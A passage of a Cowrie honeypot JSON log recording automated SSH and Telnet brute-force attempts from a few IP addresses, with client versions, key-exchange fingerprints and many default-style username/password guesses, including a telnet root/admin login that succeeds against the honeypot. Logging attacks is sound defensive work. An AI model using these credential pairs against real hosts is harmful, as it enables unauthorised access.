bc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:16:48.506936Z","src_ip":"212.227.235.229","session":"02e981c483a6"}
{"eventid":"cowrie.login.failed","username":"reception","password":"reception","message":"login attempt [reception/reception] failed","sensor":"my-vps","timestamp":"2025-08-26T04:16:48.983993Z","src_ip":"212.227.235.229","session":"d7dd96f337d2"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:16:49.770934Z","src_ip":"212.227.235.229","session":"b3788ef54993"}
{"eventid":"cowrie.login.failed","username":"public","password":"public","message":"login attempt [public/public] failed","sensor":"my-vps","timestamp":"2025-08-26T04:16:51.166181Z","src_ip":"212.227.235.229","session":"b3788ef54993"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:16:52.055348Z","src_ip":"212.227.235.229","session":"c7e849ffe0fe"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:16:52.056120Z","src_ip":"212.227.235.229","session":"c7e849ffe0fe"}
{"eventid":"cowrie.session.closed","duration":"10.1","message":"Connection lost after 10.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:16:52.895067Z","src_ip":"212.227.235.229","session":"b3788ef54993"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:16:53.448152Z","src_ip":"212.227.235.229","session":"d7dd96f337d2"}
{"eventid":"cowrie.login.failed","username":"support","password":"1234","message":"login attempt [support/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T04:16:54.946072Z","src_ip":"212.227.235.229","session":"02e981c483a6"}
{"eventid":"cowrie.login.failed","username":"help","password":"1234","message":"login attempt [help/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T04:16:54.991095Z","src_ip":"212.227.235.229","session":"c7e849ffe0fe"}
{"eventid":"cowrie.session.closed","duration":"12.3","message":"Connection lost after 12.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:16:57.383519Z","src_ip":"212.227.235.229","session":"c7e849ffe0fe"}
{"eventid":"cowrie.session.closed","duration":"18.3","message":"Connection lost after 18.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:16:59.796416Z","src_ip":"212.227.235.229","session":"02e981c483a6"}
{"eventid":"cowrie.login.failed","username":"pizza","password":"pizza","message":"login attempt [pizza/pizza] failed","sensor":"my-vps","timestamp":"2025-08-26T04:17:02.015469Z","src_ip":"212.227.235.229","session":"7138e0402003"}
{"eventid":"cowrie.session.closed","duration":"22.5","message":"Connection lost after 22.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:17:03.642157Z","src_ip":"212.227.235.229","session":"7138e0402003"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38280,"dst_ip":"1.2.3.4","dst_port":23,"session":"d917ae9ff509","protocol":"telnet","message":"New connection: 212.227.235.229:38280 (1.2.3.4:23) [session: d917ae9ff509]","sensor":"my-vps","timestamp":"2025-08-26T04:17:04.539908Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:17:04.754845Z","src_ip":"212.227.235.229","session":"d917ae9ff509"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:17:04.819658Z","src_ip":"212.227.235.229","session":"d917ae9ff509"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51774,"dst_ip":"1.2.3.4","dst_port":22,"session":"084ed51f5597","protocol":"ssh","message":"New connection: 212.227.235.229:51774 (1.2.3.4:22) [session: 084ed51f5597]","sensor":"my-vps","timestamp":"2025-08-26T04:17:09.601528Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:17:09.643922Z","src_ip":"212.227.235.229","session":"084ed51f5597"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:17:09.885085Z","src_ip":"212.227.235.229","session":"084ed51f5597"}
{"eventid":"cowrie.login.failed","username":"ssh","password":"ssh","message":"login attempt [ssh/ssh] failed","sensor":"my-vps","timestamp":"2025-08-26T04:17:11.759554Z","src_ip":"212.227.235.229","session":"084ed51f5597"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53906,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cbb8e013af8","protocol":"ssh","message":"New connection: 212.227.235.229:53906 (1.2.3.4:22) [session: 1cbb8e013af8]","sensor":"my-vps","timestamp":"2025-08-26T04:17:12.492249Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:17:12.573196Z","src_ip":"212.227.235.229","session":"1cbb8e013af8"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:17:12.810162Z","src_ip":"212.227.235.229","session":"1cbb8e013af8"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:17:13.181415Z","src_ip":"212.227.235.229","session":"084ed51f5597"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51802,"dst_ip":"1.2.3.4","dst_port":22,"session":"35cb1494efb0","protocol":"ssh","message":"New connection: 212.227.235.229:51802 (1.2.3.4:22) [session: 35cb1494efb0]","sensor":"my-vps","timestamp":"2025-08-26T04:17:13.701606Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:17:13.888513Z","src_ip":"212.227.235.229","session":"35cb1494efb0"}
{"eventid":"cowrie.session.connect","src_ip":"187.85.2.216","src_port":51146,"dst_ip":"1.2.3.4","dst_port":23,"session":"68a74219d2ab","protocol":"telnet","message":"New connection: 187.85.2.216:51146 (1.2.3.4:23) [session: 68a74219d2ab]","sensor":"my-vps","timestamp":"2025-08-26T04:17:13.906978Z"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:17:14.002344Z","src_ip":"212.227.235.229","session":"35cb1494efb0"}
{"eventid":"cowrie.login.failed","username":"webadmin","password":"webadmin","message":"login attempt [webadmin/webadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T04:17:16.231689Z","src_ip":"212.227.235.229","session":"35cb1494efb0"}
{"eventid":"cowrie.login.failed","username":"opc","password":"opc","message":"login attempt [opc/opc] failed","sensor":"my-vps","timestamp":"2025-08-26T04:17:17.221524Z","src_ip":"212.227.235.229","session":"1cbb8e013af8"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:17:17.543811Z","src_ip":"212.227.235.229","session":"35cb1494efb0"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:17:18.483621Z","src_ip":"212.227.235.229","session":"1cbb8e013af8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45916,"dst_ip":"1.2.3.4","dst_port":22,"session":"c758f13313aa","protocol":"ssh","message":"New connection: 212.227.235.229:45916 (1.2.3.4:22) [session: c758f13313aa]","sensor":"my-vps","timestamp":"2025-08-26T04:17:25.594260Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:17:25.595379Z","src_ip":"212.227.235.229","session":"c758f13313aa"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128"